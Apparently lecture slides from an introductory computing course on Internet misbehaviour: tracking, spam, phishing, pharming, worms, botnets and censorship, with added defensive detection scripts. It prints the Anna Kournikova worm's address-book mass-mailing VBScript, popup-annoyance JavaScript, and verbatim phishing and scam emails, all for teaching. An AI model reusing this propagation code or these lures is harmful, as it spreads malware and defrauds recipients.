11/30

COS 109 Monday November 30
• Housekeeping
– Lab 7 and Problem Set 8 available now
– Final exam – January 18 (Monday) at 7:30PM
• Today’s class
– A variety of forms of bad behavior on the Internet
Malware
Botnets
Internet censorship
Cookies are not the only tracking mechanism
• web bugs, web beacons, single-pixel gifs
– tiny images that report the use of a particular page
– these can be used in mail messages, not just browsers
• Flash cookies ("local shared object")
– cookie-like mechanism used by Flash
• "super cookies"
– e.g., Verizon's X-UIDH HTTP header on cellphones
• HTML canvas fingerprinting
– uses subtle differences in browser behavior to distinguish users
• defenses:
– addons like AdBlock, FlashBlock, Cookie Monster, Ghostery, NoScript
But, companies can retaliate
http://webpolicy.org/2014/10/24/how-verizons-advertising-header-works/
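As an added illustration (not code from the lecture), a small scanner that applies the web-bug description above to an HTML page: it flags an <img> that is 1x1 or hidden and that also fetches from a third-party host or carries a long per-user token. The heuristics, host names and sample page are all constructed for the example.

```python
# Added example (not from the lecture): flag likely web bugs / tracking pixels
# in an HTML page. The heuristics are my own: a tiny or hidden <img> whose src
# points at a host other than the page's own, especially one carrying a
# per-user token in its query string, is what a "single-pixel gif" looks like.
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse


class ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append({k: (v or "") for k, v in attrs})


def is_tiny(attrs):
    """1x1 (or 0x0) dimensions, or a style that hides the image outright."""
    w, h = attrs.get("width", ""), attrs.get("height", "")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (w in ("0", "1") and h in ("0", "1")) or "display:none" in style


def find_web_bugs(html, page_host):
    """Return (src, reasons) for each <img> that looks like a tracking pixel."""
    parser = ImgCollector()
    parser.feed(html)
    hits = []
    for img in parser.images:
        src = img.get("src", "")
        parts = urlparse(src)
        host = parts.hostname or page_host      # relative src: first party
        reasons = []
        if is_tiny(img):
            reasons.append("tiny or hidden")
        if host != page_host:
            reasons.append("third-party host " + host)
        if any(len(v[0]) >= 16 for v in parse_qs(parts.query).values()):
            reasons.append("long identifier in query string")
        # A tiny first-party spacer with no identifier is just layout;
        # tiny plus third-party or plus an identifier is a beacon.
        if "tiny or hidden" in reasons and len(reasons) > 1:
            hits.append((src, reasons))
    return hits


# Constructed sample: a newsletter-style page with one hidden beacon.
SAMPLE_PAGE = """
<html><body>
<h1>Newsletter</h1>
<img src="/images/logo.png" width="200" height="60">
<img src="http://track.example-ads.net/pixel.gif?uid=a1b2c3d4e5f60718&mail=42"
     width="1" height="1" style="display:none">
<img src="https://cdn.example.com/photo.jpg">
</body></html>
"""

if __name__ == "__main__":
    for src, why in find_web_bugs(SAMPLE_PAGE, "www.example.com"):
        print(src, "->", ", ".join(why))
```

The same scan works on the HTML body of a mail message, which is where the slide notes these beacons also turn up.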
Plug-ins, add-ons, extensions, etc.
• programs that extend capabilities of browser, mailer, etc.
– browser provides API, protocol for data exchange
– extension focuses on specific application area
e.g., documents, pictures, sound, movies, scripting language, ...
– may exist standalone as well as in plug-in form
– e.g., Acrobat Reader, Flash, Quicktime, Windows Media Player, ...
• scripting languages interpret downloaded programs
– Javascript
– Java
compiled into instructions for a virtual machine
(like the Toy machine on steroids)
instructions are interpreted by virtual machine in browser
Javascript tracking
• most web pages include some Javascript
• some is used for interactive features, validation, etc.
• much is used for tracking:
"Google Analytics offers a great breadth of functionality - you
can use it to track visitor flow through your site, to view the
source of referrals to your site, and to see how well visitors
make it through a conversion process such as purchasing an item
or signing up for a newsletter."
• defenses:
NoScript disables all Javascript
Ghostery disables Javascript trackers from a list
Potential security & privacy problems
• attacks against client
[diagram: client / net / server]
– release of client information
cookies: client remembers info for subsequent visits to same server
– adware, phishing, spyware, viruses, ...
spyware: client sends info to server upon connection (Sony, …)
often from unwise downloading
– buggy/misconfigured browsers, etc., permit vandalism, theft, hijacking, ...
• attacks against server
– client asks server to run a program when using cgi-bin
server-side programming has to be careful
– buggy code on server permits break-in, theft, vandalism, hijacking, …
– denial of service attacks
• attacks against information in transit
– eavesdropping
encryption helps
– masquerading
needs authentication in both directions
Privacy on the Web
• what does a browser send with a web request?
– IP address, browser type, operating system type
– referrer (URL of the page you were on)
– Cookies
• Which browser am I using?
• what do "they" know about you?
– whatever you tell them, implicitly or explicitly (e.g., Facebook)
– public records are really public
– lots of big databases like phone books
– log files everywhere
– aggregators collect a lot of information for advertising
– spyware, key loggers and similar tools collect for nefarious purposes
– government spying is everywhere
• who owns your information?
– in the USA, they do
– less so in the EU
Targeted advertising at Target
Whenever possible, Target assigns each shopper a unique code —
known internally as the Guest ID number — that keeps tabs on
everything they buy. “If you use a credit card or a coupon, or fill
out a survey, or mail in a refund, or call the customer help line,
or open an e-mail we’ve sent you or visit our Web site, we’ll
record it and link it to your Guest ID … We want to know
everything we can.”
Also linked to your Guest ID is demographic information like your
age, whether you are married and have kids, which part of town
you live in, how long it takes you to drive to the store, your
estimated salary, whether you’ve moved recently, what credit
cards you carry in your wallet and what Web sites you visit.
Target can buy data about your ethnicity, job history, the
magazines you read, if you’ve ever declared bankruptcy or got
divorced, the year you bought (or lost) your house, where you
went to college, what kinds of topics you talk about online,
whether you prefer certain brands of coffee, paper towels, cereal
or applesauce, your political leanings, reading habits, charitable
giving and the number of cars you own.
Public records
• election contributions are public records
• house purchases are public records
• census data is confidential for 72 years
Website of the day – is this bad behavior?
An email I received a few years ago
From: Elizabeth Swart [mailto:swarte@nwpg.gov.za]
Sent: Monday, November 25, 2013 7:35 AM
Subject: Your password will expire in 3 Days
Dear e-mail owner,
Your password will expire in 3 Days CLICK HERE to validate your e-mail.
Thanks
System Administrator
Disclaimer
"This e-mail and any files transmitted with it may contain information which
is confidential, private or privilege in nature and it is for the sole use of the
recipient to whom it is addressed. If you are not the intended recipient, you
must immediately notify the sender via electronic mail and further refrain
from reading, disseminating, distributing, copying or using this message or
any of its transmitted files. Any views of this message and its transmitted
files are those of the sender unless the sender specifically states such views
to be those of the North-West Provincial Government. Though this message
and its transmitted files have been swept for the presence of computer
viruses, the North-West Provincial Government accepts no liability
whatsoever for any loss, damage or expenses resulting directly or indirectly
from the use or access of this message or any of its transmitted files."
More spam
Date: Thu, 8 Oct 2015 08:03:21 -0700
From: Marilyn Fagles <marilynfagles@yahoo.com>
Reply-To: marilynfagles@outlook.com
To: undisclosed recipients: ;
Subject: How Are You Doing???
Good Morning,
Can i ask you to do me a favor?
Best, Lynne
Date: Thu, 26 Nov 2015 03:01:07 +0100 (CET)
From: Liliane Bettencourt <khadija.hadj-salem@lcis.grenoble-inp.fr>
Reply-To: Liliane Bettencourt <lilianbett@outlook.com>
To: undisclosed-recipients: ;
Subject: Donation
-I, Liliane authenticate this email of 3.5M USD donation to you,please view
my link: http://en.wikipedia.org/wiki/Liliane_Bettencourt and Email me on
lilianbett@outlook.com for more info
Even more spam
Date: Sun, 27 Sep 2015 06:07:23 -0700
From: Kmart~Reward~Center <KmartRewardCenter@achenavy.win>
To: david@daviddobkin.com
Subject: Kmart Thank You Bonus, No. 24051150
$50 Kmart Reward
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
Kmart Member david@daviddobkin.com
This week only we are offering a $50 Reward for all Kmart shoppers. (Expires 28Sep2015)
Go here to claim your Kmart Voucher today- http://details.bonusgiftrewards.date
Thanks again for shopping with us.
Kmart
Shop Your Way
===================================
Shopping Bonus No. 24051150
Shopper ID: KB2873212
Bad things that people do
• Spam
• Worms
• Viruses
• Phishing
• Pharming
• Pagejacking and mousetrapping
• Flybox
• Denial of service
(some of) this morning’s spam
Spam
Date: wo, 29 jan 2003 15:42:30
From: "mawelala2003@rediff.com" <mawelala@mail.com>
To: dpd@CS.Princeton.EDU
Subject: URGENT PARTNERSHIP
REQUEST FOR FINANCIAL TRANSACTION
I am pleased to introduce myself to you. My name is Mr.Joseph Mawelala a native of South Africa currently on course here in the
Netherlands.
I am writing this letter to request your assistance in order to redeem an investment with the then South African mining cooperation
now the ministry of natural resources. The said investment, now valued at $19,750,000.00 (Nineteen million seven hundred and
fifty thousand dollars) was purchased by Mr.Lucio Goran and contracted out of South African mining cooperation in 1977.The
redeemable investment interest, has now fully matured since last year.
Since March last year, several attempts have been made to contact Mr Lucio without success. And there is no way to get in touch with
any of his close relatives in whose favour the investment cash value can be paid.
Since we have asses to all Mr.Lucios information?s we can actually claim this money with the help of my partner in the ministry of
natural resources. All we have to do is to file claims using you as Mr.Lucios relative, whom the money will be paid to without delay.
I Would like to assure you that there is absolutely nothing to worry about, because it is perfectly safe and risk free. Please ensure to
keep this matter strictly confidential. My partner will file for the claims of this money on your behalf in the south African Mining
cooperation. When the claim is approved, you as the beneficiary would be paid the sum of $19,750.000.00.
Due to the fact that the money can be paid into any bank account of your choice, your responsibility is to assure us that my partners and
I receive 70%of the total sum. While you keep 25% for your assistance and the balance 5% would be set aside for any expenses
that maybe incurred in the course of this transaction.
I would appreciate if you can give your assistance and guarantee that our share would be secured. Please for the sake of confidentiality
you can reach me on my personal email(mawelala@mail.com).Let me know if this proposal is acceptable to you.
TRULY YOURS,
JOSEPH MAWELALA.
What becomes of people who send messages such as this?
Worms
• Internet worms are truly autonomous virtual viruses,
spreading across the net, breaking into computers, and
replicating without human assistance and usually without
human knowledge. http://www.livinginternet.com/i/is_vir_first.htm
The impact of a worm on a Windows machine
• A worm in action
The first worm
The first worm disabled most of the Internet then
existing. Robert Morris, a Computer Science graduate student at
Cornell University and (embarrassingly) son of the Chief Scientist at
the National Computer Security Center, wrote a 99 line program in
the C language designed to self-replicate and propagate itself from
machine to machine across the Internet. The worm performed the
trick by combining a bug in the debugging mode of the sendmail
program used to control email on almost all Internet computers, a
bug in the finger program, and the Unix rexec and rsh commands.
On November 2, 1988, Morris released his worm, but did so from an
MIT computer to disguise his origin. In his view, only one thing went
wrong -- the worm started replicating at a much faster rate than
he had predicted, and began crashing and disabling computers across
the Internet.
Morris sent out an anonymous message telling people how to disable
the worm, but because it had brought down the Internet, the
message about how to disable it couldn't get through. The worm
eventually infected more than 6,000 computers across the Internet.
Within a day teams of programmers at the University of California
at Berkeley and Purdue University reverse engineered the worm and
developed methods of stopping it. The Internet then came back to
normal in a couple of days.
A more recent worm
• Stuxnet (2010)
– Believed to have been developed by Israel and the USA
– Attacked sites in Iran
The uranium enrichment plant at Natanz
Destroyed roughly 1/5 of the centrifuges by causing them to spin out
of control
– First publicly known attack of cyber warfare
Viruses
• Internet viruses are spread like worms but have the power to
corrupt functions on your machine.
http://www.livinginternet.com/i/is_vir_first.htm
The Anna Kournikova virus
The Anna Kournikova computer virus was a computer virus authored
by Dutch programmer Jan de Wit on Feb 11, 2001. It was designed
to trick email users into opening a mail message purportedly
containing a picture of tennis player Anna Kournikova, while actually
hiding a malicious program. If set off, the program plunders the
address book of the Microsoft Outlook e-mail program and attempts
to send itself to all the people listed there.[1] The Kournikova virus
tempts users with the message: "Hi: Check This!", with what appears
to be a picture file labelled "AnnaKournikova.jpg.vbs".[1] The worm
arrives in an email with the subject line "Here you have, ;0)" and an
attached file called AnnaKournikova.jpg.vbs. When launched under
Microsoft Windows the file does not display a picture of Anna
Kournikova but launches a viral Visual Basic Script that forwards
itself to everybody in the Microsoft Outlook address book of the
victim.
The virus was created using a simple and widely available Visual Basic
Worm Generator program developed by an Argentinian programmer
called “[K]Alamar”.[2] While similar to the ILOVEYOU virus that
struck a year earlier, in 2000, the Anna Kournikova virus did not
corrupt data on the infected computer.[2]
From http://en.wikipedia.org/wiki/Anna_Kournikova_(computer_virus)
Inner core of Anna Kournikova
' FILESYSTEMOBJ and SHELL are created earlier in the script (not shown on the slide)
Set OUTLOOK = CreateObject("Outlook.Application")
If OUTLOOK = "Outlook" Then
  Set MAPI = OUTLOOK.GetNameSpace("MAPI")
  Set ADRLISTS = MAPI.AddressLists
  For Each adr In ADRLISTS
    If adr.AddressEntries.Count <> 0 Then
      adrcount = adr.AddressEntries.Count
      For idx = 1 To adrcount
        Set item = OUTLOOK.CreateItem(0)
        Set entry = adr.AddressEntries(idx)
        item.To = entry.Address
        item.Subject = "Here you have, ;o)"
        item.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
        Set attach = item.Attachments
        attach.Add FILESYSTEMOBJ.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
        item.DeleteAfterSubmit = True
        If item.To <> "" Then
          item.Send
          SHELL.regwrite "HKCU\software\OnTheFly\mailed", "1"
        End If
      Next
    End If
  Next
End If
Warning: Don’t try this at home
• De Wit was tried in Leeuwarden and was charged with spreading
data into a computer network with the intention of causing
damage, a crime that carried a maximum sentence of four years
in prison and a fine of 100,000 guilders (US$41,300).[4]
• The lawyers for Jan de Wit called for the dismissal of charges
against him, arguing that the worm caused minimal damage. The
FBI submitted evidence to the Dutch court and suggested that
US$166,000 in damages was caused by the worm. De Wit
admitted he created the worm using a virus creation toolkit but
told the court when he posted the virus to a newsgroup he did it
"without thinking and without overseeing the consequences". He
denied any intent to cause damage. De Wit has been sentenced
to 150 hours community service or 75 days in jail.[4]
How do viruses spread?
• Watching a virus spread (circa 2001)
• Famous viruses
• A more recent virus attack
Phishing
• A phishing attack is an attempt to get your credit card or other
personal information.
• Phishing attacks are often done by using a fake website that
mimics a valid site.
A phishing attack
Date: Mon, 6 Nov 2006 09:23:09 -0500
From: Sears Card <accounts@searscard.com>
Subject: Sears Card Account Payment Notification
Sears Card Account Payment Notification
A payment posted to your Sears Card account on or before 30 October 2006.
IP address: 86.102.33.19
Because the Lookup Country for this IP address, we decided to restrict your Sears Card account
features in order to protect our entire payment system form future fraudulent transactions.
To report unauthorized use of your account, to change your password, to check available
credit, or for more information about your account, go to:
http://ns2.fastpace.com.hk/usage/.www.sears.com/us/cards/update.php?CARD=update
This message is for information purposes only.
Please understand that we cannot respond to individual messages through this email address. It
is not secure and should not be used for credit card account related questions.
For questions about your credit card, please Contact Us:
http://ns2.fastpace.com.hk/usage/.www.sears.com/us/cards/update.php?CARD=update
After you have submitted your information, check for a response within 4-four business days.
Just return to the Write to Customer Care section and select the View/Update Messages
link.
From the web…
If you search for IP address: 86.102.33.19
• You get to http://www.millersmiles.co.uk/report/3724
• How not to get phish'ed
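As an added example (not from the lecture), the check a mail filter or a careful reader can make on the link in the Sears message above: the URL mentions www.sears.com, but only the host part decides where the browser goes, and that host is ns2.fastpace.com.hk. The suffix list and brand watch list are constructed stand-ins for real ones.

```python
# Added example (not from the lecture): take a link from a mail message apart
# and ask which host actually serves it. The phish above buries "www.sears.com"
# in the PATH of a page on ns2.fastpace.com.hk; only the host part decides
# where the browser goes. Suffix and brand lists here are constructed stand-ins.
from urllib.parse import urlparse

# Constructed, deliberately tiny list of two-label public suffixes; real code
# would consult the Public Suffix List.
TWO_LABEL_SUFFIXES = {"com.hk", "co.uk", "com.au"}

# Constructed watch list of brands that get impersonated.
BRANDS = {"sears.com", "paypal.com", "hotmail.com"}

# The link from the lecture's Sears phish, quoted from the slide above.
PHISH_URL = ("http://ns2.fastpace.com.hk/usage/.www.sears.com"
             "/us/cards/update.php?CARD=update")


def registered_domain(host):
    """Strip subdomains: ns2.fastpace.com.hk -> fastpace.com.hk."""
    labels = host.lower().split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def analyze_link(url):
    """Report the real host and every brand the URL mentions without landing on."""
    parts = urlparse(url)
    host = parts.hostname or ""
    domain = registered_domain(host) if host else ""
    impersonates = []
    for brand in BRANDS:
        mentioned = brand in url.lower()      # anywhere: subdomain, path, query
        if mentioned and domain != brand:     # ... but not where we actually go
            impersonates.append(brand)
    return {
        "host": host,
        "registered_domain": domain,
        "uses_tls": parts.scheme == "https",
        "impersonates": sorted(impersonates),
        "suspicious": bool(impersonates),
    }


if __name__ == "__main__":
    for link in (PHISH_URL, "https://www.sears.com/us/cards"):
        print(link, "->", analyze_link(link))
```

The same check catches the subdomain variant (a host such as www.sears.com.example.test), because the registered domain is still not sears.com.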
Pharming
Pharming (pronounced “farming”) is another form of online fraud, very similar to its cousin
phishing. Pharmers rely upon the same bogus Web sites and theft of confidential information
to perpetrate online scams, but are more difficult to detect in many ways because they are
not reliant upon the victim accepting a “bait” message. Instead of relying completely on users
clicking on an enticing link in fake email messages, pharming instead re-directs victims to the
bogus Web site even if they type the right Web address of their bank or other online
service into their Web browser.
Pharmers re-direct their victims using one of several ploys. The first method – the one that
earned pharming its name – is actually an old attack called DNS cache poisoning. DNS cache
poisoning is an attack on the Internet naming system that allows users to enter in meaningful
names for Web sites (www.mybank.com) rather than a difficult to remember series of
numbers (192.168.1.1). The naming system relies upon DNS servers to handle the conversion
of the letter-based Web site names, which are easily recalled by people, into the
machine-understandable digits that whisk users to the Web site of their choice. When a pharmer
mounts a successful DNS cache poisoning attack, they are effectively changing the rules of
how traffic flows for an entire section of the Internet! The potential widespread impact of
pharmers routing a vast number of unsuspecting victims to a series of bogus, hostile Web
sites is how these fraudsters earned their namesake.
Phishers drop a couple lines in the water and wait to see who will take the bait. Pharmers
are more like cybercriminals harvesting the Internet at a scale larger than anything seen
before.
http://us.norton.com/cybercrime/pharming.jsp
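As an added example (not from the lecture or Norton), the sanity check that stands between a resolver's cache and the poisoning described above: a reply is only believed if it is marked as a response and its transaction ID and question match the query the resolver actually sent. The packets are built by hand from constructed values; nothing touches the network.

```python
# Added example (not from the lecture): the check a resolver's cache must make
# before believing a DNS answer. Cache poisoning works by slipping a forged
# reply in ahead of the real one; a reply is only usable if its transaction ID
# and question match the query that was actually sent. Packets are built by
# hand here (constructed sample, no network).
import struct


def encode_name(name):
    """www.mybank.com -> b'\\x03www\\x06mybank\\x03com\\x00' (wire-format name)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, name, qtype=1):
    """Standard query: 12-byte header + one question (A record by default)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def build_response(txid, name, ip, qtype=1):
    """A reply mapping name to ip; used for both the real and the forged reply."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD, RA
    question = encode_name(name) + struct.pack("!HH", qtype, 1)
    # Answer: name pointer to offset 12, type, class, TTL, rdlength, rdata.
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = struct.pack("!HHHIH", 0xC00C, qtype, 1, 300, 4) + rdata
    return header + question + answer


def parse_question(packet):
    """Return (txid, flags, qname, qtype, offset of the byte after the question)."""
    txid, flags, _qdcount = struct.unpack("!HHH", packet[:6])
    pos, labels = 12, []
    while packet[pos] != 0:
        n = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    qtype = struct.unpack("!H", packet[pos + 1:pos + 3])[0]
    return txid, flags, ".".join(labels), qtype, pos + 5


def accept_response(query, response):
    """The resolver's sanity check: the answered IP, or None if the reply is rejected."""
    q_id, _, q_name, q_type, _ = parse_question(query)
    r_id, r_flags, r_name, r_type, pos = parse_question(response)
    if not r_flags & 0x8000:                        # must be a response
        return None
    if (r_id, r_name.lower(), r_type) != (q_id, q_name.lower(), q_type):
        return None                                 # ID or question mismatch
    rdlength = struct.unpack("!H", response[pos + 10:pos + 12])[0]
    rdata = response[pos + 12:pos + 12 + rdlength]
    return ".".join(str(b) for b in rdata)


# Constructed sample: the genuine reply matches the query's ID; the forged one
# carries a guessed ID and is thrown away even though it answers the same name.
QUERY = build_query(0x1A2B, "www.mybank.com")
GOOD = build_response(0x1A2B, "www.mybank.com", "203.0.113.10")
FORGED = build_response(0x0001, "www.mybank.com", "198.51.100.66")

if __name__ == "__main__":
    print("genuine:", accept_response(QUERY, GOOD))
    print("forged: ", accept_response(QUERY, FORGED))
```

A 16-bit ID alone is a thin defence, which is why real resolvers also randomize the UDP source port and, where deployed, verify DNSSEC signatures.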
Pharming example
One of the first known pharming attacks was conducted in early 2005.
Instead of taking advantage of a software flaw, the attacker
appears to have duped the personnel at an Internet Service Provider
into entering the transfer of location from one place to another.
Once the original address was moved to the new address, the
attacker had effectively “hijacked” the Web site and made the
genuine site impossible to reach, embarrassing the victim company
and impacting its business. A pharming attack that took place weeks
after this incident had more ominous consequences. Using a software
flaw as their foothold, pharmers swapped out hundreds of legitimate
domain names for those of hostile, bogus Web sites. There were
three waves of attacks, two of which attempted to load spyware and
adware onto victim machines and the third that appeared to be an
attempt to drive users to a Web site selling pills that are often sold
through spam email.
http://us.norton.com/cybercrime/pharming.jsp
Other forms of bad behavior
mousetrapping
A practice employed by some Web sites in which the back and exit
buttons of a visitor's Web browser are disabled and attempts to
leave the site are redirected to other pages on the site or to other
sites against the visitor's will. Mousetrapping is most often
associated with adult-oriented Web sites.
page-jacking
A deceptive practice that detours Web visitors from legitimate sites
generated as search engine results to copycat Web pages, from
which they will be redirected to pornographic or other unwanted
sites. Page-jacking is accomplished by copying the contents and
metatags of a Web page, altering its title and content so that, on
search results, it displays before the original, and then submitting
the copied page to search engines. When clicking on the link to the
copied site, the visitor will instead be redirected to an unwanted and
unrelated site. This can happen in larger arenas as well.
http://docs.law.gwu.edu/facweb/claw/mousetrap1.htm
Rerouting
Border gateway protocol (BGP) is the glue that holds the internet
together. If bad information is in routing tables, bad things can
happen. E.g. routing through China or Belarus and more detail
Mousetrapping code
<html>
<head>
<title>A Web annoyance</title>
</head>
<body>
This would be annoying if instead of presenting a lovely picture,
(<a href="javascript:void(0)"
    onMouseOver="m = window.open('Eisgruber.jpg','PopUp2','width=200,height=300,menubar=no'); return true;"
    onMouseOut="m.window.close(); return true;">a porno photo came up</a>).
<br>
<p>
</body>
</html>
Other annoyances
• Flybox
Setting the Javascript code
var URL = [];
var dx = [];
var dy = [];
var x = [];
var y = [];
var win = [];
var NUM = 7;
URL[1] = "Carson.jpg"
URL[2] = "Christie.jpg"
URL[3] = "Clinton.jpg"
URL[4] = "Obama.jpg"
URL[5] = "Rubio.jpg"
URL[6] = "Sanders.jpg"
URL[7] = "Trump.jpg"
var w=300, h=300;
var interval = 8;
for (i = 1 ; i <= NUM ; i++ ) {
    x[i] = (i-1)*w/NUM;
    y[i] = (i-1)*h/NUM;
    dx[i] = 3*i;
    dy[i] = 3*i;
}
for (i = 1 ; i <= NUM ; i++ ) {
    win[i] = window.open(URL[i], "", "width=" + w + ",height=" + h);
    win[i].moveTo(x[i],y[i]);
}
var intervalID = window.setInterval("bounce()", interval);
Bounce function
function bounce() {
for (i = 1 ; i <= NUM ; i++ ) {
if ((x[i]+dx[i] > (screen.availWidth - w)) || (x[i]+dx[i] < 0)) dx[i] = -dx[i];
if ((y[i]+dy[i] > (screen.availHeight - h)) || (y[i]+dy[i] < 0)) dy[i] = -dy[i];
x[i] += dx[i];
y[i] += dy[i];
win[i].moveTo(x[i],y[i]);
}
}
Something to turn it off
<form>
<input TYPE=button VALUE="Stop those DARN boxes!"
onClick="clearInterval(intervalID); for (i = 1; i <= NUM; i++) win[i].close();">
</form>
Denial of Service attacks
• How do they come about?
Botnets and their actions
• Build a network of computers (botnet)
– bots are computers that were not well secured
– botnet takes control of bots and turns them into zombies
– botnets can involve hundreds of thousands of zombies
• bots spend their time
– Finding other machines to convert to zombies
– Sending spam
– Sending viruses
– Sending spyware
– Doing other bad things
Uses of botnets
• DoS (Denial of service attacks)
– Attack a given site with a large flow of traffic
– Possibly extort money from the Web site owner in exchange for
stopping the attack (ransomware)
• Click fraud
– Use a botnet to boost advertising revenue by automatically clicking on
ads
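As an added example (not from the lecture), what the "large flow of traffic" from a botnet looks like from the server side, and the detection a site operator can run over its access log: requests are counted per source address in 10-second windows, and a single hammering host is told apart from the many-sources pattern of a botnet. The log lines and thresholds are constructed for the demo.

```python
# Added example (not from the lecture): spot a traffic flood in web-server
# access logs. Log lines and thresholds are constructed demo values. Requests
# are counted per source IP in 10-second windows; one IP far above the limit
# is a single-source flood, while a window that is busy only because hundreds
# of different IPs each sent a little is the shape a botnet produces.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r'^(\S+) - - \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Common Log Format -> (source ip, timestamp), or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts = m.group(1), m.group(2)
    return ip, datetime.strptime(ts, TIME_FMT)


def flood_report(lines, window=10, per_ip_limit=50, total_limit=200, min_sources=20):
    """One entry per window that looks like a flood: (window start, kind, detail)."""
    buckets = defaultdict(Counter)              # window start -> Counter(ip)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, t = parsed
        start = t - timedelta(seconds=t.timestamp() % window)
        buckets[start][ip] += 1
    report = []
    for start, counter in sorted(buckets.items()):
        noisy = sorted(ip for ip, n in counter.items() if n > per_ip_limit)
        if noisy:
            report.append((start, "single-source flood", noisy))
        elif sum(counter.values()) > total_limit and len(counter) > min_sources:
            report.append((start, "distributed flood", len(counter)))
    return report


def make_log():
    """Constructed log: normal browsing, then one hammering host, then a botnet."""
    base = datetime.strptime("08/Oct/2015:08:03:00 -0700", TIME_FMT)

    def entry(ip, t):
        return '%s - - [%s] "GET / HTTP/1.1" 200 512' % (ip, t.strftime(TIME_FMT))

    lines = []
    for s in range(30):                         # 3 clients, 1 request/second
        for ip in ("192.0.2.10", "192.0.2.11", "192.0.2.12"):
            lines.append(entry(ip, base + timedelta(seconds=s)))
    for k in range(120):                        # 120 requests in 2 seconds
        lines.append(entry("198.51.100.7", base + timedelta(seconds=30 + k // 60)))
    for k in range(300):                        # 300 bots, one request each
        ip = "198.18.%d.%d" % (k // 250, k % 250 + 1)
        lines.append(entry(ip, base + timedelta(seconds=40 + k % 5)))
    return lines


if __name__ == "__main__":
    for start, kind, detail in flood_report(make_log()):
        print(start.strftime("%H:%M:%S"), kind, detail)
```

The single-source case can be rate-limited at the firewall; the distributed case is why botnet traffic is hard to block by address and is usually absorbed upstream instead.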
Workarounds
• Secure email
• “Last year I was being held in a foreign Country (Tonga). Their
government, through the efforts of a local businessman and his
computer wise son, were tapping into my hotmail. They were
reading all of my Hotmail, communications between my USA
attorney and myself.
• They always seemed to be ahead of our game. We could not
understand how they knew so much about what we were doing.
Since my actual freedom was in question a friend told me about
your mail system. We all downloaded and started using it. The
intrusions stopped the first time running.
• I was able to use the legal system to get my passport back and
the ability to return to the USA. My business was lost and so
was my money, but I am fine and not being detained in that
corrupt country any longer and have started to rebuild.
• Thank you for this service and I hope that it continues to grow.”
• Anonymous
From http://www.hushmail.com/about/testimonials/
Further workarounds
• Tor for Onion routing – encrypting through multiple layers
– Testimonial
– Protecting online privacy
• Telegram for secure messaging
• Wickr – the most trusted messenger in the world
• Open Whisper systems for free worldwide encrypted phone calls
The other side of the coin
• Censorship in China
• Censorship in Saudi Arabia
• Tor stinks